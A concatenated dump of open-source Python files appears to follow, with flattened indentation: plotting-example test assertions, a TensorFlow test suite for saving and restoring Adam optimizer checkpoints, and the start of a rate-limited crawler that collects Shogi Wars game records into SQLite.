obj = docs.support.plot_example_2.MySource()
obj.indep_var = numpy.array([1, 2, 3])
obj.dep_var = numpy.array([-1, 1, -1])
assert obj.indep_var.tolist() == [1, 2, 3]
assert obj.dep_var.tolist() == [-1, 1, -1]
assert obj._complete
#
import docs.support.plot_example_3
ivar, dvar = docs.support.plot_example_3.proc_func1(
1e-12, numpy.array([1, 2])
)
dvar = dvar.tolist()
assert ivar, dvar == (1, [0, 1])
obj = docs.support.plot_example_3.create_csv_source()
assert obj.indep_var.tolist() == [2, 3, 4]
assert obj.dep_var.tolist() == [0, -30, 10]
#
import docs.support.plot_example_4
obj = docs.support.plot_example_4.create_basic_source()
assert obj.indep_var.tolist() == [2, 3]
assert obj.dep_var.tolist() == [-10, 10]
assert obj._complete
#
import docs.support.plot_example_5
obj = docs.support.plot_example_5.create_csv_source()
assert obj.indep_var.tolist() == [10, 11, 12, 13, 14]
assert obj.dep_var.tolist() == [16, 6, 26, -4, 36]
#
import docs.support.plot_example_6
docs.support.plot_example_6.panel_iterator_example(no_print=False)
stdout, stderr = capsys.readouterr()
ref = (
'Series 1:\n'
'Independent variable: [ 1.0, 2.0, 3.0, 4.0 ]\n'
'Dependent variable: [ 1.0, -10.0, 10.0, 5.0 ]\n'
'Label: Goals\n'
'Color: k\n'
'Marker: o\n'
'Interpolation: CUBIC\n'
'Line style: -\n'
'Secondary axis: False\n'
'\n'
'Series 2:\n'
'Independent variable: [ 100.0, 200.0, 300.0, 400.0 ]\n'
'Dependent variable: [ 50.0, 75.0, 100.0, 125.0 ]\n'
'Label: Saves\n'
'Color: b\n'
'Marker: None\n'
'Interpolation: STRAIGHT\n'
'Line style: --\n'
'Secondary axis: False\n\n'
)
assert stdout == ref
| mit | -3,682,959,280,773,998,000 | 33.695187 | 79 | 0.594482 | false |
allenlavoie/tensorflow | tensorflow/contrib/optimizer_v2/checkpointable_utils_test.py | 1 | 32824 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# TODO(josh11b): Forked from contrib/eager/python to test OptimizerV2 the same way
# OptimizerV1 is tested. This file should be removed once the fork is resolved.
import functools
import os
import six
from tensorflow.contrib.eager.python import checkpointable_utils
from tensorflow.contrib.optimizer_v2 import adam
from tensorflow.python.client import session as session_lib
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import function
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.keras._impl.keras.engine import training
from tensorflow.python.keras._impl.keras.layers import core
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.training import checkpointable
from tensorflow.python.training import saver as core_saver
from tensorflow.python.training import training_util
class NonLayerCheckpointable(checkpointable.Checkpointable):
def __init__(self):
super(NonLayerCheckpointable, self).__init__()
self.a_variable = checkpointable_utils.add_variable(
self, name="a_variable", shape=[])
# pylint: disable=not-callable
class MyModel(training.Model):
"""A concrete Model for testing."""
def __init__(self):
super(MyModel, self).__init__()
self._named_dense = core.Dense(1, use_bias=True)
self._second = core.Dense(1, use_bias=False)
# We can still track Checkpointables which aren't Layers.
self._non_layer = NonLayerCheckpointable()
def call(self, values):
ret = self._second(self._named_dense(values))
return ret
class _MirroringSaveable(
core_saver.BaseSaverBuilder.ResourceVariableSaveable):
def __init__(self, primary_variable, mirrored_variable, name):
self._primary_variable = primary_variable
self._mirrored_variable = mirrored_variable
super(_MirroringSaveable, self).__init__(
self._primary_variable, "", name)
def restore(self, restored_tensors, restored_shapes):
"""Restore the same value into both variables."""
tensor, = restored_tensors
return control_flow_ops.group(
self._primary_variable.assign(tensor),
self._mirrored_variable.assign(tensor))
class _OwnsMirroredVariables(checkpointable.CheckpointableBase):
"""A Checkpointable object which returns a more complex SaveableObject."""
def __init__(self):
self.non_dep_variable = variable_scope.get_variable(
name="non_dep_variable", initializer=6., use_resource=True)
self.mirrored = variable_scope.get_variable(
name="mirrored", initializer=15., use_resource=True)
def _gather_saveables_for_checkpoint(self):
def _saveable_factory(name=self.non_dep_variable.name):
return _MirroringSaveable(
primary_variable=self.non_dep_variable,
mirrored_variable=self.mirrored,
name=name)
return {checkpointable.VARIABLE_VALUE_KEY: _saveable_factory}
# The Saver sorts by name before parsing, so we need a name property.
@property
def name(self):
return self.non_dep_variable.name
class CheckpointingTests(test.TestCase):
@test_util.run_in_graph_and_eager_modes(assert_no_eager_garbage=True)
def testNamingWithOptimizer(self):
input_value = constant_op.constant([[3.]])
model = MyModel()
# A nuisance Model using the same optimizer. Its slot variables should not
# go in the checkpoint, since it is never depended on.
other_model = MyModel()
optimizer = adam.AdamOptimizer(0.001)
optimizer_step = training_util.get_or_create_global_step()
root_checkpointable = checkpointable_utils.Checkpoint(
optimizer=optimizer, model=model, optimizer_step=optimizer_step)
if context.executing_eagerly():
optimizer.minimize(
lambda: model(input_value),
global_step=optimizer_step)
optimizer.minimize(
lambda: other_model(input_value),
global_step=optimizer_step)
else:
train_op = optimizer.minimize(
model(input_value), global_step=optimizer_step)
optimizer.minimize(
other_model(input_value),
global_step=optimizer_step)
self.evaluate(checkpointable_utils.gather_initializers(
root_checkpointable))
self.evaluate(train_op)
named_variables, serialized_graph = (
checkpointable_utils._serialize_object_graph(root_checkpointable))
expected_checkpoint_names = (
# Created in the root node, so no prefix.
"optimizer_step",
"model/_second/kernel",
"model/_named_dense/kernel",
"model/_named_dense/bias",
# non-Layer dependency of the model
"model/_non_layer/a_variable",
# The optimizer creates two non-slot variables
"optimizer/beta1_power",
"optimizer/beta2_power",
# Slot variables
"model/_second/kernel/.OPTIMIZER_SLOT/optimizer/m",
"model/_second/kernel/.OPTIMIZER_SLOT/optimizer/v",
"model/_named_dense/kernel/.OPTIMIZER_SLOT/optimizer/m",
"model/_named_dense/kernel/.OPTIMIZER_SLOT/optimizer/v",
"model/_named_dense/bias/.OPTIMIZER_SLOT/optimizer/m",
"model/_named_dense/bias/.OPTIMIZER_SLOT/optimizer/v",
)
suffix = "/.ATTRIBUTES/VARIABLE_VALUE"
expected_checkpoint_names = [
name + suffix for name in expected_checkpoint_names]
six.assertCountEqual(self, expected_checkpoint_names,
named_variables.keys())
# Check that we've mapped to the right variable objects (not exhaustive)
self.assertEqual(
"global_step:0",
named_variables["optimizer_step" + suffix].name)
self.assertEqual(
"my_model/dense_1/kernel:0",
named_variables["model/_second/kernel" + suffix].name)
self.assertEqual(
"my_model/dense/kernel:0",
named_variables["model/_named_dense/kernel" + suffix].name)
self.assertEqual(
"beta1_power:0",
named_variables["optimizer/beta1_power" + suffix].name)
self.assertEqual(
"beta2_power:0",
named_variables["optimizer/beta2_power" + suffix].name)
# Spot check the generated protocol buffers.
self.assertEqual("optimizer",
serialized_graph.nodes[0].children[1].local_name)
optimizer_node = serialized_graph.nodes[serialized_graph.nodes[0].children[
1].node_id]
self.assertEqual("beta1_power",
optimizer_node.children[0].local_name)
self.assertEqual("beta1_power",
serialized_graph.nodes[optimizer_node.children[0].node_id]
.attributes[0].full_name)
self.assertEqual(
"my_model/dense/kernel",
serialized_graph.nodes[optimizer_node.slot_variables[0]
.original_variable_node_id]
.attributes[0].full_name)
# We strip off the :0 suffix, as variable.name-based saving does.
self.assertEqual(
"my_model/dense/kernel/Adam",
serialized_graph.nodes[optimizer_node.slot_variables[0]
.slot_variable_node_id]
.attributes[0].full_name)
self.assertEqual(
"my_model/dense/kernel/Adam:0",
optimizer.get_slot(
var=named_variables["model/_named_dense/kernel" + suffix],
name="m").name)
self.assertEqual(
"model/_named_dense/kernel" + suffix,
serialized_graph.nodes[
optimizer_node.slot_variables[0]
.original_variable_node_id].attributes[0].checkpoint_key)
self.assertEqual("m", optimizer_node.slot_variables[0].slot_name)
self.assertEqual(
"model/_named_dense/kernel/.OPTIMIZER_SLOT/optimizer/m" + suffix,
serialized_graph.nodes[
optimizer_node.slot_variables[0]
.slot_variable_node_id].attributes[0].checkpoint_key)
@test_util.run_in_graph_and_eager_modes()
def testSaveRestore(self):
model = MyModel()
optimizer = adam.AdamOptimizer(0.001)
root_checkpointable = checkpointable_utils.Checkpoint(
optimizer=optimizer, model=model)
input_value = constant_op.constant([[3.]])
if context.executing_eagerly():
optimizer.minimize(
lambda: model(input_value))
else:
train_op = optimizer.minimize(model(input_value))
# TODO(allenl): Make initialization more pleasant when graph building.
root_checkpointable.save_counter # pylint: disable=pointless-statement
self.evaluate(checkpointable_utils.gather_initializers(
root_checkpointable))
self.evaluate(train_op)
prefix = os.path.join(self.get_temp_dir(), "ckpt")
self.evaluate(state_ops.assign(model._named_dense.variables[1], [42.]))
m_bias_slot = optimizer.get_slot(model._named_dense.variables[1], "m")
self.evaluate(state_ops.assign(m_bias_slot, [1.5]))
save_path = root_checkpointable.save(file_prefix=prefix)
self.evaluate(state_ops.assign(model._named_dense.variables[1], [43.]))
self.evaluate(state_ops.assign(root_checkpointable.save_counter, 3))
optimizer_variables = self.evaluate(optimizer.variables())
self.evaluate(state_ops.assign(m_bias_slot, [-2.]))
# Immediate restoration
status = root_checkpointable.restore(save_path=save_path).assert_consumed()
status.run_restore_ops()
self.assertAllEqual([42.], self.evaluate(model._named_dense.variables[1]))
self.assertAllEqual(1, self.evaluate(root_checkpointable.save_counter))
self.assertAllEqual([1.5], self.evaluate(m_bias_slot))
if not context.executing_eagerly():
return # Restore-on-create is only supported when executing eagerly
on_create_model = MyModel()
on_create_optimizer = adam.AdamOptimizer(
0.001,
        # Preserve beta1_power and beta2_power when applying gradients so we can
# test that they've been restored correctly.
beta1=1.0, beta2=1.0)
on_create_root = checkpointable_utils.Checkpoint(
optimizer=on_create_optimizer, model=on_create_model)
# Deferred restoration
status = on_create_root.restore(save_path=save_path)
on_create_model(constant_op.constant([[3.]])) # create variables
self.assertAllEqual(1, self.evaluate(on_create_root.save_counter))
self.assertAllEqual([42.],
self.evaluate(
on_create_model._named_dense.variables[1]))
on_create_m_bias_slot = on_create_optimizer.get_slot(
on_create_model._named_dense.variables[1], "m")
# Optimizer slot variables are created when the original variable is
# restored.
self.assertAllEqual([1.5], self.evaluate(on_create_m_bias_slot))
self.assertAllEqual(optimizer_variables[2:],
self.evaluate(on_create_optimizer.variables()))
dummy_var = resource_variable_ops.ResourceVariable([1.])
on_create_optimizer.minimize(loss=dummy_var.read_value)
status.assert_consumed()
beta1_power, beta2_power = on_create_optimizer._get_beta_accumulators()
self.assertAllEqual(optimizer_variables[0], self.evaluate(beta1_power))
self.assertAllEqual(optimizer_variables[1], self.evaluate(beta2_power))
# TODO(allenl): Debug garbage created by this test in python3.
def testDeferredRestorationUsageEager(self):
"""An idiomatic eager execution example."""
num_training_steps = 10
checkpoint_directory = self.get_temp_dir()
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
for training_continuation in range(3):
model = MyModel()
optimizer = adam.AdamOptimizer(0.001)
root = checkpointable_utils.Checkpoint(
optimizer=optimizer, model=model,
optimizer_step=training_util.get_or_create_global_step())
root.restore(core_saver.latest_checkpoint(checkpoint_directory))
for _ in range(num_training_steps):
# TODO(allenl): Use a Dataset and serialize/checkpoint it.
input_value = constant_op.constant([[3.]])
optimizer.minimize(
lambda: model(input_value), # pylint: disable=cell-var-from-loop
global_step=root.optimizer_step)
root.save(file_prefix=checkpoint_prefix)
self.assertEqual((training_continuation + 1) * num_training_steps,
root.optimizer_step.numpy())
def testUsageGraph(self):
"""Expected usage when graph building."""
with context.graph_mode():
num_training_steps = 10
checkpoint_directory = self.get_temp_dir()
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
for training_continuation in range(3):
with ops.Graph().as_default():
model = MyModel()
optimizer = adam.AdamOptimizer(0.001)
root = checkpointable_utils.Checkpoint(
optimizer=optimizer, model=model,
global_step=training_util.get_or_create_global_step())
input_value = constant_op.constant([[3.]])
train_op = optimizer.minimize(
model(input_value),
global_step=root.global_step)
checkpoint_path = core_saver.latest_checkpoint(checkpoint_directory)
with self.test_session(graph=ops.get_default_graph()) as session:
status = root.restore(save_path=checkpoint_path)
status.initialize_or_restore(session=session)
if checkpoint_path is None:
self.assertEqual(0, training_continuation)
with self.assertRaises(AssertionError):
status.assert_consumed()
else:
status.assert_consumed()
for _ in range(num_training_steps):
session.run(train_op)
root.save(file_prefix=checkpoint_prefix, session=session)
self.assertEqual((training_continuation + 1) * num_training_steps,
session.run(root.global_step))
self.assertEqual(training_continuation + 1,
session.run(root.save_counter))
@test_util.run_in_graph_and_eager_modes()
def testAgnosticUsage(self):
"""Graph/eager agnostic usage."""
# Does create garbage when executing eagerly due to ops.Graph() creation.
num_training_steps = 10
checkpoint_directory = self.get_temp_dir()
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
for training_continuation in range(3):
with ops.Graph().as_default(), self.test_session(
graph=ops.get_default_graph()), test_util.device(use_gpu=True):
model = MyModel()
optimizer = adam.AdamOptimizer(0.001)
root = checkpointable_utils.Checkpoint(
optimizer=optimizer, model=model,
global_step=training_util.get_or_create_global_step())
checkpoint_path = core_saver.latest_checkpoint(checkpoint_directory)
status = root.restore(save_path=checkpoint_path)
input_value = constant_op.constant([[3.]])
train_fn = functools.partial(
optimizer.minimize,
functools.partial(model, input_value),
global_step=root.global_step)
if not context.executing_eagerly():
train_fn = functools.partial(self.evaluate, train_fn())
status.initialize_or_restore()
for _ in range(num_training_steps):
train_fn()
root.save(file_prefix=checkpoint_prefix)
self.assertEqual((training_continuation + 1) * num_training_steps,
self.evaluate(root.global_step))
self.assertEqual(training_continuation + 1,
self.evaluate(root.save_counter))
# pylint: disable=cell-var-from-loop
@test_util.run_in_graph_and_eager_modes()
def testWithDefun(self):
num_training_steps = 2
checkpoint_directory = self.get_temp_dir()
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
for training_continuation in range(3):
with ops.Graph().as_default(), self.test_session(
graph=ops.get_default_graph()), test_util.device(use_gpu=True):
model = MyModel()
# Don't actually train so we can test variable values
optimizer = adam.AdamOptimizer(0.)
root = checkpointable_utils.Checkpoint(
optimizer=optimizer, model=model,
global_step=training_util.get_or_create_global_step())
checkpoint_path = core_saver.latest_checkpoint(checkpoint_directory)
status = root.restore(save_path=checkpoint_path)
def train_fn():
@function.defun
def _call_model(x):
return model(x)
with backprop.GradientTape() as tape:
loss = _call_model(constant_op.constant([[3.]]))
gradients = tape.gradient(loss, model.variables)
return optimizer.apply_gradients(zip(gradients, model.variables),
global_step=root.global_step)
if not context.executing_eagerly():
train_fn = functools.partial(
self.evaluate, train_fn())
status.initialize_or_restore()
for _ in range(num_training_steps):
train_fn()
if training_continuation > 0:
status.assert_consumed()
self.assertAllClose([[42.]], self.evaluate(model.variables[0]))
else:
self.evaluate(model.variables[0].assign([[42.]]))
root.save(file_prefix=checkpoint_prefix)
self.assertEqual((training_continuation + 1) * num_training_steps,
self.evaluate(root.global_step))
self.assertEqual(training_continuation + 1,
self.evaluate(root.save_counter))
# pylint: enable=cell-var-from-loop
def _get_checkpoint_name(self, name):
root = checkpointable.Checkpointable()
checkpointable_utils.add_variable(
root, name=name, shape=[1, 2], dtype=dtypes.float64)
named_variables, _ = checkpointable_utils._serialize_object_graph(root)
checkpoint_name, = named_variables.keys()
with ops.name_scope("root/" + checkpoint_name):
pass # Make sure we can use this as an op name if we prefix it.
return checkpoint_name
def testAnonymousVarsInInit(self):
class Model(training.Model):
def __init__(self):
super(Model, self).__init__()
self.w = resource_variable_ops.ResourceVariable(0.0)
self.b = resource_variable_ops.ResourceVariable(0.0)
self.vars = [self.w, self.b]
def call(self, x):
return x * self.w + self.b
with context.eager_mode():
model = Model()
optimizer = adam.AdamOptimizer(learning_rate=0.05)
checkpoint_directory = self.get_temp_dir()
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
checkpoint = checkpointable_utils.Checkpoint(
model=model, optimizer=optimizer)
for _ in range(2):
checkpoint.save(checkpoint_prefix)
with backprop.GradientTape() as tape:
loss = (constant_op.constant(1.)
- model(constant_op.constant(1.))) ** 2
grad = tape.gradient(loss, model.vars)
optimizer.apply_gradients(
[(g, v) for g, v in zip(grad, model.vars)])
@test_util.run_in_graph_and_eager_modes(assert_no_eager_garbage=True)
def testDeferredSlotRestoration(self):
checkpoint_directory = self.get_temp_dir()
root = checkpointable.Checkpointable()
root.var = checkpointable_utils.add_variable(
root, name="var", initializer=0.)
optimizer = adam.AdamOptimizer(0.1)
if context.executing_eagerly():
optimizer.minimize(root.var.read_value)
else:
train_op = optimizer.minimize(root.var)
# Note that `optimizer` has not been added as a dependency of
# `root`. Create a one-off grouping so that slot variables for `root.var`
# get initialized too.
self.evaluate(checkpointable_utils.gather_initializers(
checkpointable_utils.Checkpoint(root=root, optimizer=optimizer)))
self.evaluate(train_op)
self.evaluate(state_ops.assign(root.var, 12.))
no_slots_path = checkpointable_utils.CheckpointableSaver(root).save(
os.path.join(checkpoint_directory, "no_slots"))
root.optimizer = optimizer
self.evaluate(state_ops.assign(root.var, 13.))
self.evaluate(state_ops.assign(optimizer.get_slot(name="m", var=root.var),
14.))
slots_path = checkpointable_utils.CheckpointableSaver(root).save(
os.path.join(checkpoint_directory, "with_slots"))
new_root = checkpointable.Checkpointable()
# Load the slot-containing checkpoint (deferred), then immediately overwrite
# the non-slot variable (also deferred).
slot_status = checkpointable_utils.CheckpointableSaver(
new_root).restore(slots_path)
no_slot_status = checkpointable_utils.CheckpointableSaver(
new_root).restore(no_slots_path)
with self.assertRaises(AssertionError):
no_slot_status.assert_consumed()
new_root.var = checkpointable_utils.add_variable(
new_root, name="var", shape=[])
no_slot_status.assert_consumed()
no_slot_status.run_restore_ops()
self.assertEqual(12., self.evaluate(new_root.var))
new_root.optimizer = adam.AdamOptimizer(0.1)
with self.assertRaisesRegexp(AssertionError, "beta1_power"):
slot_status.assert_consumed()
self.assertEqual(12., self.evaluate(new_root.var))
if context.executing_eagerly():
# Slot variables are only created with restoring initializers when
# executing eagerly.
self.assertEqual(14., self.evaluate(
new_root.optimizer.get_slot(name="m", var=new_root.var)))
else:
self.assertIs(new_root.optimizer.get_slot(name="m", var=new_root.var),
None)
if context.executing_eagerly():
new_root.optimizer.minimize(new_root.var.read_value)
else:
train_op = new_root.optimizer.minimize(new_root.var)
# The slot variable now exists; restore() didn't create it, but we should
# now have a restore op for it.
slot_status.run_restore_ops()
self.assertEqual(14., self.evaluate(
new_root.optimizer.get_slot(name="m", var=new_root.var)))
self.evaluate(train_op)
slot_status.assert_consumed()
def testManySavesGraph(self):
"""Saves after the first should not modify the graph."""
with context.graph_mode():
graph = ops.Graph()
with graph.as_default(), self.test_session(graph):
checkpoint_directory = self.get_temp_dir()
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
obj = checkpointable.Checkpointable()
obj.var = variable_scope.get_variable(name="v", initializer=0.)
obj.opt = adam.AdamOptimizer(0.1)
obj.opt.minimize(obj.var.read_value())
self.evaluate(checkpointable_utils.gather_initializers(obj))
saver = checkpointable_utils.CheckpointableSaver(obj)
saver.save(checkpoint_prefix)
before_ops = graph.get_operations()
saver.save(checkpoint_prefix)
self.assertEqual(before_ops, graph.get_operations())
def testManyRestoresGraph(self):
"""Restores after the first should not modify the graph."""
with context.graph_mode():
graph = ops.Graph()
with graph.as_default(), self.test_session(graph):
checkpoint_directory = self.get_temp_dir()
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
obj = checkpointable.Checkpointable()
obj.var = variable_scope.get_variable(name="v", initializer=0.)
obj.opt = adam.AdamOptimizer(0.1)
obj.opt.minimize(obj.var.read_value())
self.evaluate(checkpointable_utils.gather_initializers(obj))
saver = checkpointable_utils.CheckpointableSaver(obj)
save_path = saver.save(checkpoint_prefix)
saver.restore(save_path)
before_ops = graph.get_operations()
saver.restore(save_path)
self.assertEqual(before_ops, graph.get_operations())
def testMultipleGraphsNonSlotVariables(self):
with context.graph_mode():
checkpoint_directory = self.get_temp_dir()
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
optimizer = adam.AdamOptimizer(0.001)
# Construct a model in one graph
first_graph = ops.Graph()
first_session = session_lib.Session(graph=first_graph)
with first_graph.as_default(), first_session.as_default():
first_variable = resource_variable_ops.ResourceVariable([1.])
first_root_checkpointable = checkpointable_utils.Checkpoint(
optimizer=optimizer, variable=first_variable)
train_op = optimizer.minimize(first_variable.read_value)
self.evaluate(checkpointable_utils.gather_initializers(
first_root_checkpointable))
self.evaluate(train_op)
self.evaluate(first_variable.assign([1.]))
self.evaluate(optimizer.get_slot(
var=first_variable, name="m").assign([2.]))
beta1_power, _ = optimizer._get_beta_accumulators()
self.evaluate(beta1_power.assign(3.))
# Save and load in a second graph
second_graph = ops.Graph()
with second_graph.as_default(), session_lib.Session(graph=second_graph):
second_variable = resource_variable_ops.ResourceVariable([1.])
second_root_checkpointable = checkpointable_utils.Checkpoint(
optimizer=optimizer, variable=second_variable)
train_op = optimizer.minimize(second_variable.read_value)
second_root_checkpointable.restore(None).initialize_or_restore()
self.evaluate(train_op)
self.evaluate(second_variable.assign([4.]))
self.evaluate(optimizer.get_slot(
var=second_variable, name="m").assign([5.]))
beta1_power, _ = optimizer._get_beta_accumulators()
self.evaluate(beta1_power.assign(6.))
save_path = second_root_checkpointable.save(checkpoint_prefix)
self.evaluate(second_variable.assign([7.]))
self.evaluate(optimizer.get_slot(
var=second_variable, name="m").assign([8.]))
beta1_power, _ = optimizer._get_beta_accumulators()
self.assertAllEqual(6., self.evaluate(beta1_power))
status = second_root_checkpointable.restore(save_path)
status.assert_consumed().run_restore_ops()
self.assertAllEqual([4.], self.evaluate(second_variable))
self.assertAllEqual([5.], self.evaluate(optimizer.get_slot(
var=second_variable, name="m")))
beta1_power, _ = optimizer._get_beta_accumulators()
self.assertAllEqual(6., self.evaluate(beta1_power))
# Check that the first graph is unmolested
with first_graph.as_default(), first_session.as_default():
self.assertAllEqual([1.], self.evaluate(first_variable))
self.assertAllEqual([2.], self.evaluate(optimizer.get_slot(
var=first_variable, name="m")))
beta1_power, _ = optimizer._get_beta_accumulators()
self.assertAllEqual(3., self.evaluate(beta1_power))
class CheckpointCompatibilityTests(test.TestCase):
def _initialized_model(self):
input_value = constant_op.constant([[3.]])
model = MyModel()
optimizer = adam.AdamOptimizer(0.001)
optimizer_step = training_util.get_or_create_global_step()
root_checkpointable = checkpointable_utils.Checkpoint(
optimizer=optimizer, model=model, optimizer_step=optimizer_step)
train_op = optimizer.minimize(
functools.partial(model, input_value),
global_step=optimizer_step)
self.evaluate(checkpointable_utils.gather_initializers(
root_checkpointable))
self.evaluate(train_op)
# A regular variable, a slot variable, and a non-slot Optimizer variable
# with known values to check when loading.
self.evaluate(model._named_dense.bias.assign([1.]))
self.evaluate(optimizer.get_slot(
var=model._named_dense.bias, name="m").assign([2.]))
beta1_power, _ = optimizer._get_beta_accumulators()
self.evaluate(beta1_power.assign(3.))
return root_checkpointable
def _set_sentinels(self, root_checkpointable):
self.evaluate(root_checkpointable.model._named_dense.bias.assign([101.]))
self.evaluate(
root_checkpointable.optimizer.get_slot(
var=root_checkpointable.model._named_dense.bias, name="m")
.assign([102.]))
beta1_power, _ = root_checkpointable.optimizer._get_beta_accumulators()
self.evaluate(beta1_power.assign(103.))
def _check_sentinels(self, root_checkpointable):
self.assertAllEqual(
[1.], self.evaluate(root_checkpointable.model._named_dense.bias))
self.assertAllEqual([2.], self.evaluate(
root_checkpointable.optimizer.get_slot(
var=root_checkpointable.model._named_dense.bias, name="m")))
beta1_power, _ = root_checkpointable.optimizer._get_beta_accumulators()
self.assertAllEqual(3., self.evaluate(beta1_power))
def _write_name_based_checkpoint(self):
checkpoint_directory = self.get_temp_dir()
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
with context.graph_mode():
save_graph = ops.Graph()
with save_graph.as_default(), self.test_session(
graph=save_graph) as session:
root = self._initialized_model()
name_saver = core_saver.Saver()
return name_saver.save(
sess=session, save_path=checkpoint_prefix,
global_step=root.optimizer_step)
@test_util.run_in_graph_and_eager_modes()
def testLoadFromNameBasedSaver(self):
"""Save a name-based checkpoint, load it using the object-based API."""
with test_util.device(use_gpu=True):
save_path = self._write_name_based_checkpoint()
root = self._initialized_model()
self._set_sentinels(root)
with self.assertRaises(AssertionError):
self._check_sentinels(root)
object_saver = checkpointable_utils.CheckpointableSaver(root)
status = object_saver.restore(save_path)
with self.assertRaises(AssertionError):
status.assert_consumed()
status.run_restore_ops()
self._check_sentinels(root)
self._set_sentinels(root)
status.initialize_or_restore()
self._check_sentinels(root)
# TODO(allenl): Test for the core name-based saver loading object-based
# checkpoints once object-based checkpointing is in core.
def testSaveGraphLoadEager(self):
checkpoint_directory = self.get_temp_dir()
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
with context.graph_mode():
save_graph = ops.Graph()
with save_graph.as_default(), self.test_session(
graph=save_graph) as session:
root = self._initialized_model()
object_saver = checkpointable_utils.CheckpointableSaver(root)
save_path = object_saver.save(
session=session, file_prefix=checkpoint_prefix)
with context.eager_mode():
root = self._initialized_model()
self._set_sentinels(root)
root.restore(save_path).assert_consumed()
self._check_sentinels(root)
def testSaveEagerLoadGraph(self):
checkpoint_directory = self.get_temp_dir()
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
with context.eager_mode():
root = self._initialized_model()
object_saver = checkpointable_utils.CheckpointableSaver(root)
save_path = object_saver.save(file_prefix=checkpoint_prefix)
with context.graph_mode():
save_graph = ops.Graph()
with save_graph.as_default(), self.test_session(
graph=save_graph):
root = self._initialized_model()
self._set_sentinels(root)
root.restore(save_path).assert_consumed().run_restore_ops()
self._check_sentinels(root)
if __name__ == "__main__":
test.main()
| apache-2.0 | -1,022,322,882,351,399,800 | 43.902873 | 82 | 0.668962 | false |
tosh1ki/pyogi | pyogi/warscrawler.py | 1 | 9953 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import re
import yaml
import sys
import time
import sqlite3
import requests
import datetime as dt
import pandas as pd
gtype_dict = {'10m': '', '3m': 'sb', '10s': 's1'}
WCSA_PATTERN = re.compile(r'(?<=receiveMove\(\").+?(?=\"\);)')
GAME_HEADER_PATTERN = re.compile(r'(?<=var\sgamedata\s=\s){[^}]+}', re.DOTALL)
class WarsCrawler(object):
    '''Crawler for Shogi Wars (shogiwars.heroz.jp) game records.
    Args
    ----------
    dbpath : string
        Path to the SQLite database file
    interval : int, optional (default = 10)
        Time interval (in seconds) between HTTP requests
    n_retry : int, optional (default = 10)
        Maximum number of retries per request
    '''
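    # A minimal usage sketch (the SQLite path 'kifu.db', the user id
    # 'example_user' and the CSV path 'urls.csv' below are hypothetical;
    # gtype='' selects 10-minute games, see gtype_dict):
    #
    #     crawler = WarsCrawler('kifu.db', interval=10, n_retry=10)
    #     crawler.get_kifu_url(['example_user'], gtype='', csvpath='urls.csv')
    #     crawler.get_all_kifu('urls.csv')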
def __init__(self, dbpath, interval=10, n_retry=10):
self.dbpath = dbpath
self.INTERVAL_TIME = interval
self.MAX_N_RETRY = n_retry
        # Connect to the SQLite database
self.con = sqlite3.connect(self.dbpath)
self.con.text_factory = str
def get_html(self, url):
        '''Fetch the HTML of the given url.
'''
time.sleep(self.INTERVAL_TIME)
for n in range(self.MAX_N_RETRY):
time.sleep(10 * n * self.INTERVAL_TIME)
try:
res = requests.session().get(url)
except requests.ConnectionError:
print('\nConnection aborted.')
print(url)
res = None
if res and res.status_code == 200:
return res.text
else:
print('\nretry (WarsCrawler.get_html())\n')
sys.stdout.flush()
else:
sys.exit('Exceeded MAX_N_RETRY (WarsCrawler.get_html())')
def get_url(self, user, gtype, max_iter=10):
        ''' Fetch the kifu (game record) urls of the given user.
        Args
        ----------
        user: string
            User name
        gtype: string
            Kifu type
        max_iter: int, optional (default=10)
            Maximum number of records to fetch.
            The limit is only checked after every batch of 10 records,
            so it is not strictly enforced.
        '''
url_list = []
start = 1
url = ('http://shogiwars.heroz.jp/users/history/'
'{user}?gtype={gtype}&start={start}')
pattern = 'http://shogiwars.heroz.jp:3002/games/[\w\d_-]+'
while start <= max_iter:
            # Format into a new variable so the template keeps its
            # placeholders for the following pages.
            _url = url.format(user=user, gtype=gtype, start=start)
            text = self.get_html(_url)
match = re.findall(pattern, text)
if match:
url_list.extend(match)
start += len(match)
else:
break
return url_list
def get_kifu(self, url):
        ''' Fetch the kifu pointed to by url and return it, together with related metadata, as a dict.
'''
html = self.get_html(url)
res = re.findall(GAME_HEADER_PATTERN, html)[0]
        # The keys in the scraped snippet are not quoted, so work around that with yaml
d = yaml.load(re.sub('[{}\t,]', ' ', res))
d['user0'], d['user1'], d['date'] = d['name'].split('-')
wars_csa = re.findall(WCSA_PATTERN, html)[0]
d['wcsa'] = wars_csa
d['datetime'] = dt.datetime.strptime(d['date'], '%Y%m%d_%H%M%S')
d['csa'] = self.wcsa_to_csa(d)
return d
def get_all_kifu(self, csvpath):
        ''' Fetch every kifu whose url is listed in the CSV file and append it to SQLite.
Args
----------
csvpath: string
            Path to the CSV file that contains the urls to crawl
'''
df_crawled = pd.read_csv(csvpath)
not_crawled = df_crawled.query('crawled==0')
if not_crawled.empty:
            print('All kifu listed in {0} have already been fetched'.format(csvpath))
return None
url_list = list(not_crawled.url)
